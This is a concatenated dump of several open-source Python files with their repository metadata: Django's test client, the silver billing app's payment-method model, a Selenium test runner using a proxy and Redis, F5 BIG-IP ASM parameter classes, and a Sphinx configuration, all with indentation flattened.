Once you have a request object you can pass it to any view function,
just as if that view had been hooked up using a URLconf.
"""
def __init__(self, **defaults):
self.defaults = defaults
self.cookies = SimpleCookie()
self.errors = BytesIO()
def _base_environ(self, **request):
"""
The base environment for a request.
"""
# This is a minimal valid WSGI environ dictionary, plus:
# - HTTP_COOKIE: for cookie support,
# - REMOTE_ADDR: often useful, see #8551.
# See http://www.python.org/dev/peps/pep-3333/#environ-variables
environ = {
'HTTP_COOKIE': self.cookies.output(header='', sep='; '),
'PATH_INFO': str('/'),
'REMOTE_ADDR': str('127.0.0.1'),
'REQUEST_METHOD': str('GET'),
'SCRIPT_NAME': str(''),
'SERVER_NAME': str('testserver'),
'SERVER_PORT': str('80'),
'SERVER_PROTOCOL': str('HTTP/1.1'),
'wsgi.version': (1, 0),
'wsgi.url_scheme': str('http'),
'wsgi.input': FakePayload(b''),
'wsgi.errors': self.errors,
'wsgi.multiprocess': True,
'wsgi.multithread': False,
'wsgi.run_once': False,
}
environ.update(self.defaults)
environ.update(request)
return environ
def request(self, **request):
"Construct a generic request object."
return WSGIRequest(self._base_environ(**request))
def _encode_data(self, data, content_type):
if content_type is MULTIPART_CONTENT:
return encode_multipart(BOUNDARY, data)
else:
# Encode the content so that the byte representation is correct.
match = CONTENT_TYPE_RE.match(content_type)
if match:
charset = match.group(1)
else:
charset = settings.DEFAULT_CHARSET
return force_bytes(data, encoding=charset)
def _get_path(self, parsed):
path = force_str(parsed[2])
# If there are parameters, add them
if parsed[3]:
path += str(";") + force_str(parsed[3])
path = uri_to_iri(path).encode(UTF_8)
# Under Python 3, non-ASCII values in the WSGI environ are arbitrarily
# decoded with ISO-8859-1. We replicate this behavior here.
# Refs comment in `get_bytes_from_wsgi()`.
return path.decode(ISO_8859_1) if six.PY3 else path
def get(self, path, data=None, secure=False, **extra):
"Construct a GET request."
data = {} if data is None else data
r = {
'QUERY_STRING': urlencode(data, doseq=True),
}
r.update(extra)
return self.generic('GET', path, secure=secure, **r)
def post(self, path, data=None, content_type=MULTIPART_CONTENT,
secure=False, **extra):
"Construct a POST request."
data = {} if data is None else data
post_data = self._encode_data(data, content_type)
return self.generic('POST', path, post_data, content_type,
secure=secure, **extra)
def head(self, path, data=None, secure=False, **extra):
"Construct a HEAD request."
data = {} if data is None else data
r = {
'QUERY_STRING': urlencode(data, doseq=True),
}
r.update(extra)
return self.generic('HEAD', path, secure=secure, **r)
def options(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct an OPTIONS request."
return self.generic('OPTIONS', path, data, content_type,
secure=secure, **extra)
def put(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct a PUT request."
return self.generic('PUT', path, data, content_type,
secure=secure, **extra)
def patch(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct a PATCH request."
return self.generic('PATCH', path, data, content_type,
secure=secure, **extra)
def delete(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct a DELETE request."
return self.generic('DELETE', path, data, content_type,
secure=secure, **extra)
def generic(self, method, path, data='',
content_type='application/octet-stream', secure=False,
**extra):
"""Constructs an arbitrary HTTP request."""
parsed = urlparse(path)
data = force_bytes(data, settings.DEFAULT_CHARSET)
r = {
'PATH_INFO': self._get_path(parsed),
'REQUEST_METHOD': str(method),
'SERVER_PORT': str('443') if secure else str('80'),
'wsgi.url_scheme': str('https') if secure else str('http'),
}
if data:
r.update({
'CONTENT_LENGTH': len(data),
'CONTENT_TYPE': str(content_type),
'wsgi.input': FakePayload(data),
})
r.update(extra)
# If QUERY_STRING is absent or empty, we want to extract it from the URL.
if not r.get('QUERY_STRING'):
query_string = force_bytes(parsed[4])
# WSGI requires latin-1 encoded strings. See get_path_info().
if six.PY3:
query_string = query_string.decode('iso-8859-1')
r['QUERY_STRING'] = query_string
return self.request(**r)
class Client(RequestFactory):
"""
A class that can act as a client for testing purposes.
It allows the user to compose GET and POST requests, and
obtain the response that the server gave to those requests.
The server Response objects are annotated with the details
of the contexts and templates that were rendered during the
process of serving the request.
Client objects are stateful - they will retain cookie (and
thus session) details for the lifetime of the Client instance.
This is not intended as a replacement for Twill/Selenium or
the like - it is here to allow testing against the
contexts and templates produced by a view, rather than the
HTML rendered to the end-user.
"""
def __init__(self, enforce_csrf_checks=False, **defaults):
super(Client, self).__init__(**defaults)
self.handler = ClientHandler(enforce_csrf_checks)
self.exc_info = None
def store_exc_info(self, **kwargs):
"""
Stores exceptions when they are generated by a view.
"""
self.exc_info = sys.exc_info()
def _session(self):
"""
Obtains the current session variables.
"""
if apps.is_installed('django.contrib.sessions'):
engine = import_module(settings.SESSION_ENGINE)
cookie = self.cookies.get(settings.SESSION_COOKIE_NAME, None)
if cookie:
return engine.SessionStore(cookie.value)
else:
s = engine.SessionStore()
s.save()
self.cookies[settings.SESSION_COOKIE_NAME] = s.session_key
return s
return {}
session = property(_session)
def request(self, **request):
"""
The master request method. Composes the environment dictionary
and passes to the handler, returning the result of the handler.
Assumes defaults for the query environment, which can be overridden
using the arguments to the request.
"""
environ = self._base_environ(**request)
# Curry a data dictionary into an instance of the template renderer
# callback function.
data = {}
on_template_render = curry(store_rendered_templates, data)
signal_uid = "template-render-%s" % id(request)
signals.template_rendered.connect(on_template_render, dispatch_uid=signal_uid)
# Capture exceptions created by the handler.
got_request_exception.connect(self.store_exc_info, dispatch_uid="request-exception")
try:
try:
response = self.handler(environ)
except TemplateDoesNotExist as e:
# If the view raises an exception, Django will attempt to show
# the 500.html template. If that template is not available,
# we should ignore the error in favor of re-raising the
# underlying exception that caused the 500 error. Any other
# template found to be missing during view error handling
# should be reported as-is.
if e.args != ('500.html',):
raise
# Look for a signalled exception, clear the current context
# exception data, then re-raise the signalled exception.
# Also make sure that the signalled exception is cleared from
# the local cache!
if self.exc_info:
exc_info = self.exc_info
self.exc_info = None
six.reraise(*exc_info)
# Save the client and request that stimulated the response.
response.client = self
response.request = request
# Add any rendered template detail to the response.
response.templates = data.get("templates", [])
response.context = data.get("context")
# Attach the ResolverMatch instance to the response
response.resolver_match = SimpleLazyObject(
lambda: urlresolvers.resolve(request['PATH_INFO']))
# Flatten a single context. Not really necessary anymore thanks to
# the __getattr__ flattening in ContextList, but has some edge-case
# backwards-compatibility implications.
if response.context and len(response.context) == 1:
response.context = response.context[0]
# Update persistent cookie data.
if response.cookies:
self.cookies.update(response.cookies)
return response
finally:
signals.template_rendered.disconnect(dispatch_uid=signal_uid)
got_request_exception.disconnect(dispatch_uid="request-exception")
def get(self, path, data=None, follow=False, secure=False, **extra):
"""
Requests a response from the server using GET.
"""
response = super(Client, self).get(path, data=data, secure=secure,
**extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def post(self, path, data=None, content_type=MULTIPART_CONTENT,
follow=False, secure=False, **extra):
"""
Requests a response from the server using POST.
"""
response = super(Client, self).post(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def head(self, path, data=None, follow=False, secure=False, **extra):
"""
Request a response from the server using HEAD.
"""
response = super(Client, self).head(path, data=data, secure=secure,
**extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def options(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Request a response from the server using OPTIONS.
"""
response = super(Client, self).options(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def put(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Send a resource to the server using PUT.
"""
response = super(Client, self).put(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def patch(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Send a resource to the server using PATCH.
"""
response = super(Client, self).patch(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def delete(self, path, data='', content_type='application/octet-stream',
follow=False, secure=False, **extra):
"""
Send a DELETE request to the server.
"""
response = super(Client, self).delete(path, data=data,
content_type=content_type,
secure=secure, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def login(self, **credentials):
"""
Sets the Factory to appear as if it has successfully logged into a site.
Returns True if login is possible; False if the provided credentials
are incorrect, or the user is inactive, or if the sessions framework is
not available.
"""
from django.contrib.auth import authenticate, login
user = authenticate(**credentials)
if (user and user.is_active and
apps.is_installed('django.contrib.sessions')):
engine = import_module(settings.SESSION_ENGINE)
# Create a fake request to store login details.
request = HttpRequest()
if self.session:
request.session = self.session
else:
request.session = engine.SessionStore()
login(request, user)
# Save the session values.
request.session.save()
# Set the cookie to represent the session.
session_cookie = settings.SESSION_COOKIE_NAME
self.cookies[session_cookie] = request.session.session_key
cookie_data = {
'max-age': None,
'path': '/',
'domain': settings.SESSION_COOKIE_DOMAIN,
'secure': settings.SESSION_COOKIE_SECURE or None,
'expires': None,
}
self.cookies[session_cookie].update(cookie_data)
return True
else:
return False
def logout(self):
"""
Removes the authenticated user's cookies and session object.
Causes the authenticated user to be logged out.
"""
from django.contrib.auth import get_user, logout
request = HttpRequest()
engine = import_module(settings.SESSION_ENGINE)
if self.session:
request.session = self.session
request.user = get_user(request)
else:
request.session = engine.SessionStore()
logout(request)
self.cookies = SimpleCookie()
def _handle_redirects(self, response, **extra):
"Follows any redirects by requesting responses from the server using GET."
response.redirect_chain = []
while response.status_code in (301, 302, 303, 307):
url = response.url
redirect_chain = response.redirect_chain
redirect_chain.append((url, response.status_code))
url = urlsplit(url)
if url.scheme:
extra['wsgi.url_scheme'] = url.scheme
if url.hostname:
extra['SERVER_NAME'] = url.hostname
if url.port:
extra['SERVER_PORT'] = str(url.port)
response = self.get(url.path, QueryDict(url.query), follow=False, **extra)
response.redirect_chain = redirect_chain
# Prevent loops
if response.redirect_chain[-1] in response.redirect_chain[0:-1]:
break
return response
|
bsd-3-clause
| -1,923,242,841,704,961,000
| 37.451411
| 112
| 0.587111
| false
| 4.484826
| false
| false
| false
|
silverapp/silver
|
silver/models/payment_methods.py
|
1
|
8577
|
# Copyright (c) 2017 Presslabs SRL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, unicode_literals
from typing import Union
from itertools import chain
from annoying.functions import get_object_or_None
from cryptography.fernet import InvalidToken, Fernet
from django.core.serializers.json import DjangoJSONEncoder
from django_fsm import TransitionNotAllowed
from model_utils.managers import InheritanceManager
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models.signals import post_save, pre_save
from django.dispatch import receiver
from django.utils import timezone
from silver import payment_processors
from silver.models import Invoice, Proforma
from silver.models.billing_entities import Customer
from silver.models.transactions import Transaction
class PaymentMethodInvalid(Exception):
pass
class PaymentMethod(models.Model):
class PaymentProcessors:
@classmethod
def as_choices(cls):
for name in settings.PAYMENT_PROCESSORS.keys():
yield (name, name)
@classmethod
def as_list(cls):
return [name for name in settings.PAYMENT_PROCESSORS.keys()]
payment_processor = models.CharField(choices=PaymentProcessors.as_choices(),
blank=False, null=False, max_length=256)
customer = models.ForeignKey(Customer, models.CASCADE)
added_at = models.DateTimeField(default=timezone.now)
data = models.JSONField(blank=True, null=True, default=dict, encoder=DjangoJSONEncoder)
verified = models.BooleanField(default=False)
canceled = models.BooleanField(default=False)
valid_until = models.DateTimeField(null=True, blank=True)
display_info = models.CharField(max_length=256, null=True, blank=True)
objects = InheritanceManager()
class Meta:
ordering = ['-id']
@property
def final_fields(self):
return ['payment_processor', 'customer', 'added_at']
@property
def irreversible_fields(self):
return ['verified', 'canceled']
def __init__(self, *args, **kwargs):
super(PaymentMethod, self).__init__(*args, **kwargs)
if self.id:
try:
payment_method_class = self.get_payment_processor().payment_method_class
if payment_method_class:
self.__class__ = payment_method_class
except AttributeError:
pass
@property
def transactions(self):
return self.transaction_set.all()
def get_payment_processor(self):
return payment_processors.get_instance(self.payment_processor)
def delete(self, using=None):
if not self.state == self.States.Uninitialized:
self.remove()
super(PaymentMethod, self).delete(using=using)
def encrypt_data(self, data: Union[str, bytes]) -> str:
if isinstance(data, str):
data = data.encode(encoding="utf-8")
key = settings.PAYMENT_METHOD_SECRET
return Fernet(key).encrypt(data).decode('utf-8')
def decrypt_data(self, crypted_data: Union[str, bytes]) -> str:
if not crypted_data:
return ""
if isinstance(crypted_data, str):
crypted_data = crypted_data.encode(encoding="utf-8")
key = settings.PAYMENT_METHOD_SECRET
return Fernet(key).decrypt(crypted_data).decode("utf-8")
def cancel(self):
if self.canceled:
raise ValidationError("You can't cancel a canceled payment method.")
cancelable_states = [Transaction.States.Initial,
Transaction.States.Pending]
transactions = self.transactions.filter(state__in=cancelable_states)
errors = []
for transaction in transactions:
if transaction.state == Transaction.States.Initial:
try:
transaction.cancel()
except TransitionNotAllowed:
errors.append("Transaction {} couldn't be canceled".format(transaction.uuid))
if transaction.state == Transaction.States.Pending:
payment_processor = self.get_payment_processor()
if (hasattr(payment_processor, 'void_transaction') and
not payment_processor.void_transaction(transaction)):
errors.append("Transaction {} couldn't be voided".format(transaction.uuid))
transaction.save()
if errors:
return errors
self.canceled = True
self.save()
return None
def clean_with_previous_instance(self, previous_instance):
if not previous_instance:
return
for field in self.final_fields:
old_value = getattr(previous_instance, field, None)
current_value = getattr(self, field, None)
if old_value != current_value:
raise ValidationError(
"Field '%s' may not be changed." % field
)
for field in self.irreversible_fields:
old_value = getattr(previous_instance, field, None)
current_value = getattr(self, field, None)
if old_value and old_value != current_value:
raise ValidationError(
"Field '%s' may not be changed anymore." % field
)
def full_clean(self, *args, **kwargs):
previous_instance = kwargs.pop('previous_instance', None)
super(PaymentMethod, self).full_clean(*args, **kwargs)
self.clean_with_previous_instance(previous_instance)
# this assumes that nobody calls clean and then modifies this object
# without calling clean again
setattr(self, '.cleaned', True)
@property
def allowed_currencies(self):
return self.get_payment_processor().allowed_currencies
@property
def public_data(self):
return {}
def __str__(self):
return u'{} - {} - {}'.format(self.customer,
self.get_payment_processor_display(),
self.pk)
def create_transactions_for_issued_documents(payment_method):
customer = payment_method.customer
if payment_method.canceled or not payment_method.verified:
return []
transactions = []
for document in chain(
Proforma.objects.filter(related_document=None, customer=customer,
state=Proforma.STATES.ISSUED),
Invoice.objects.filter(state=Invoice.STATES.ISSUED, customer=customer)
):
try:
transactions.append(Transaction.objects.create(
document=document, payment_method=payment_method
))
except ValidationError:
continue
return transactions
@receiver(pre_save)
def pre_payment_method_save(sender, instance=None, **kwargs):
if not isinstance(instance, PaymentMethod):
return
payment_method = instance
previous_instance = get_object_or_None(PaymentMethod, pk=payment_method.pk)
setattr(payment_method, '.previous_instance', previous_instance)
if not getattr(payment_method, '.cleaned', False):
payment_method.full_clean(previous_instance=previous_instance)
@receiver(post_save)
def post_payment_method_save(sender, instance, **kwargs):
if not isinstance(instance, PaymentMethod):
return
payment_method = instance
if hasattr(payment_method, '.cleaned'):
delattr(payment_method, '.cleaned')
previous_instance = getattr(payment_method, '.previous_instance', None)
if not (settings.SILVER_AUTOMATICALLY_CREATE_TRANSACTIONS or
not payment_method.verified or
(not payment_method.get_payment_processor().type ==
payment_processors.Types.Triggered)):
return
if not previous_instance or not previous_instance.verified:
create_transactions_for_issued_documents(payment_method)
|
apache-2.0
| -5,897,001,218,787,682,000
| 32.244186
| 97
| 0.647779
| false
| 4.393955
| false
| false
| false
|
Goldcap/django-selenium-testing
|
ppfa/selenium_tests/webdriver.py
|
1
|
8427
|
import os
import json
import redis
import shutil
import datetime
from ws4redis.redis_store import RedisMessage
from ws4redis.publisher import RedisPublisher
from pyvirtualdisplay import Display
from selenium import webdriver
from django.test import TestCase
from django.conf import settings
from selenium_tests.models import PpfaTestAssertion
class PpfaWebDriver(TestCase):
browser = None
profile = None
logger = None
testObject = None
runObject = None
errors = []
publisher = None
profile_path = None
redis_key = "proxy_request"
redis_session = 1
REDIS_HOST = '127.0.0.1'
REDIS_PORT = 6379
assert_failed_requests = True
def __init__(self, *args, **kw):
self.r = redis.StrictRedis(host=self.REDIS_HOST, port=self.REDIS_PORT, db=0)
session = self.r.get("proxy_request")
if session:
self.redis_session = session
#print self.redis_session
super(PpfaWebDriver, self).__init__(*args, **kw)
def set_up(self):
self.clearSession(200)
self.clearSession(404)
self.clearSession(500)
self.publisher = RedisPublisher(facility='foobar', broadcast=True)
self.broadcast("Starting Test '"+self.runObject.ppfa_test.name+"'")
self.startup()
def count_requests(self):
requests_200 = self.getSession(200)
self.broadcast("Total Requests (200): %s" % len(requests_200))
requests_404 = self.getSession(404)
self.broadcast("Total Requests (404): %s" % len(requests_404))
if len(requests_404) > 0 and self.assert_failed_requests:
self.failassertion( "Assets Missing", "from", "pageload" )
for failure in requests_404:
print failure
self.broadcast(failure)
requests_500 = self.getSession(500)
self.broadcast("Total Requests (500): %s" % len(requests_500))
if len(requests_500) > 0 and self.assert_failed_requests:
self.failassertion( "Assets Broken", "from", "pageload" )
for failure in requests_500:
print failure
self.broadcast(failure)
def tear_down(self):
self.count_requests()
if self.shut_down():
return self.runObject
def startup(self):
self.broadcast("Starting Xvfb Display")
display = Display(visible=0, size=(1024, 768))
display.start()
self.broadcast("Starting Firefox Browser")
self.profile = webdriver.FirefoxProfile()
# Direct = 0, Manual = 1, PAC = 2, AUTODETECT = 4, SYSTEM = 5
self.profile.set_preference("network.proxy.type", 1)
self.profile.set_preference("network.proxy.http",settings.PROXY_HOST)
self.profile.set_preference("network.proxy.http_port",int(settings.PROXY_PORT))
self.profile.set_preference("network.proxy.ssl",settings.PROXY_HOST)
self.profile.set_preference("network.proxy.ssl_port",int(settings.PROXY_PORT))
self.profile.set_preference("general.useragent.override","ppfa_test_runner")
self.profile.update_preferences()
self.profile_path = os.path.join('tmp',self.profile.profile_dir)
#print "Destination is in %s" % self.profile_path
source = os.path.join(os.path.dirname(__file__),'cert8.db')
#print "Source is in %s" % source
shutil.copy2(source, self.profile_path)
self.browser = webdriver.Firefox(self.profile)
def setSession( self, id ):
self.redis_session = id
self.r.set(self.redis_key,self.redis_session)
def clearSession( self, status ):
self.r.zremrangebyrank(self.redis_key+"::"+str(status)+"::"+str(self.redis_session),0,-1)
def getSession( self, status ):
print "Looking for %s" % (self.redis_key+"::"+str(status)+"::"+str(self.redis_session))
results = self.r.zrange(self.redis_key+"::"+str(status)+"::"+str(self.redis_session),0,-1)
return results
def page_source(self):
time = datetime.datetime.now().strftime("%I%M%p_%B_%d_%Y")
path = "screens/"+str(self.runObject.id)
if not os.path.exists(path):
os.mkdir(path)
filename = self.redis_key+"_"+str(self.redis_session)+"_"+str(time)+".html"
with open(os.path.join(path, filename), 'wb') as temp_file:
temp_file.write(self.browser.page_source.encode('ascii','replace'))
def screencap(self):
time = datetime.datetime.now().strftime("%I%M%p_%B_%d_%Y")
path = "screens/"+str(self.runObject.id)
if not os.path.exists(path):
os.mkdir(path)
filename = self.redis_key+"_"+str(self.redis_session)+"_"+str(time)+".png"
print filename
self.browser.save_screenshot(os.path.join(path, filename))
def broadcast( self, message ):
print message
if self.publisher:
message = {"message":message}
self.publisher.publish_message(RedisMessage(json.dumps(message)))
def runassertion( self, subject, verb, object ):
assertion = PpfaTestAssertion.objects.create(
ppfa_test=self.testObject,
ppfa_test_run=self.runObject,
subject=subject,
verb=verb,
object=object,
)
result = assertion.run_assertion(self.browser)
status_type = 'success'
if not result:
self.errors.append(assertion.id)
status_type = 'error'
self.logger.log("'%s' %s %s:: %s",[subject, verb, object, assertion.status_string],status_type)
self.broadcast("'%s' %s %s:: %s" % (subject, verb, object, assertion.status_string,))
return result
def passassertion( self, subject, verb, object ):
assertion = PpfaTestAssertion.objects.create(
ppfa_test=self.testObject,
ppfa_test_run=self.runObject,
subject=subject,
verb=verb,
object=object,
status=True
)
status_type = 'success'
self.logger.log("'%s' %s %s:: %s",[subject, verb, object, assertion.status_string],status_type)
self.broadcast("'%s' %s %s:: %s" % (subject, verb, object, assertion.status_string,))
return False
def failassertion( self, subject, verb, object ):
assertion = PpfaTestAssertion.objects.create(
ppfa_test=self.testObject,
ppfa_test_run=self.runObject,
subject=subject,
verb=verb,
object=object,
status=False
)
self.errors.append(assertion.id)
status_type = 'error'
self.logger.log("'%s' %s %s:: %s",[subject, verb, object, assertion.status_string],'error')
self.broadcast("'%s' %s %s:: %s" % (subject, verb, object, assertion.status_string,))
return False
def is_element_present(self, how, what):
try: self.browser.find_element(by=how, value=what)
except NoSuchElementException, e: return False
return True
def is_alert_present(self):
try: self.browser.switch_to_alert()
except NoAlertPresentException, e: return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.browser.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally: self.accept_next_alert = True
def shut_down(self):
self.broadcast("Done Testing")
self.browser.quit()
for root, dirs, files in os.walk(self.profile_path, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
return True
|
mit
| 5,567,993,571,545,259,000
| 36.959459
| 103
| 0.568055
| false
| 4.003325
| true
| false
| false
|
F5Networks/f5-common-python
|
f5/bigip/tm/asm/policies/parameters.py
|
1
|
4409
|
# coding=utf-8
#
# Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from distutils.version import LooseVersion
from f5.bigip.resource import AsmResource
from f5.bigip.resource import Collection
class UrlParametersCollection(Collection):
"""BIG-IP® ASM Urls Parameters sub-collection."""
def __init__(self, urls_s):
self.__class__.__name__ = 'Parameters_s'
super(UrlParametersCollection, self).__init__(urls_s)
self._meta_data['object_has_stats'] = False
self._meta_data['allowed_lazy_attributes'] = [Parameter]
self._meta_data['required_json_kind'] = 'tm:asm:policies:urls:parameters:parametercollectionstate'
self._meta_data['attribute_registry'] = {
'tm:asm:policies:urls:parameters:parameterstate': Parameter
}
class ParametersCollection(Collection):
"""BIG-IP® ASM Policies Parameters sub-collection."""
def __init__(self, policy):
self.__class__.__name__ = 'Parameters_s'
super(ParametersCollection, self).__init__(policy)
self._meta_data['object_has_stats'] = False
self._meta_data['allowed_lazy_attributes'] = [Parameter]
self._meta_data['required_json_kind'] = 'tm:asm:policies:parameters:parametercollectionstate'
self._meta_data['attribute_registry'] = {
'tm:asm:policies:parameters:parameterstate': Parameter
}
class Parameters_s(object):
"""As Parameters classes are used twice as a sub-collection.
We need to utilize __new__ method in order to keep the user
interface consistent.
"""
def __new__(cls, container):
from f5.bigip.tm.asm.policies import Policy
from f5.bigip.tm.asm.policies.urls import Url
if isinstance(container, Policy):
return ParametersCollection(container)
if isinstance(container, Url):
return UrlParametersCollection(container)
class Parameter(object):
"""As Parameter classes are used twice as a sub-collection.
We need to utilize __new__ method in order to keep the user
interface consistent.
"""
def __new__(cls, container):
if isinstance(container, ParametersCollection):
return ParametersResource(container)
if isinstance(container, UrlParametersCollection):
return UrlParametersResource(container)
class UrlParametersResource(AsmResource):
"""BIG-IP® ASM Urls Parameters resource."""
def __init__(self, urls_s):
self.__class__.__name__ = 'Parameter'
super(UrlParametersResource, self).__init__(urls_s)
self.tmos_v = urls_s._meta_data['bigip']._meta_data['tmos_version']
self._meta_data['required_json_kind'] = 'tm:asm:policies:urls:parameters:parameterstate'
def create(self, **kwargs):
"""Custom create method for v12.x and above.
Change of behavior in v12 where the returned selfLink is different
from target resource, requires us to append URI after object is
created. So any modify() calls will not lead to json kind
inconsistency when changing the resource attribute.
See issue #844
"""
if LooseVersion(self.tmos_v) < LooseVersion('12.0.0'):
return self._create(**kwargs)
else:
new_instance = self._create(**kwargs)
tmp_name = str(new_instance.id)
tmp_path = new_instance._meta_data['container']._meta_data['uri']
finalurl = tmp_path + tmp_name
new_instance._meta_data['uri'] = finalurl
return new_instance
class ParametersResource(AsmResource):
"""BIG-IP® ASM Urls Parameters resource."""
def __init__(self, policy):
self.__class__.__name__ = 'Parameter'
super(ParametersResource, self).__init__(policy)
self._meta_data['required_json_kind'] = 'tm:asm:policies:parameters:parameterstate'
|
apache-2.0
| -8,019,605,598,075,704,000
| 37.304348
| 106
| 0.664018
| false
| 4.120674
| false
| false
| false
|
ivbeg/lazyscraper
|
docs/conf.py
|
1
|
8502
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# lazyscraper documentation build configuration file
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import lazyscraper
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode', 'sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'lazyscraper'
copyright = u'2018, Ivan Begtin'
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = lazyscraper.__version__
# The full version, including alpha/beta/rc tags.
release = lazyscraper.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'lazyscraperdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'lazyscraper.tex',
u'lazyscraper documentation',
u'Ivan Begtin', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
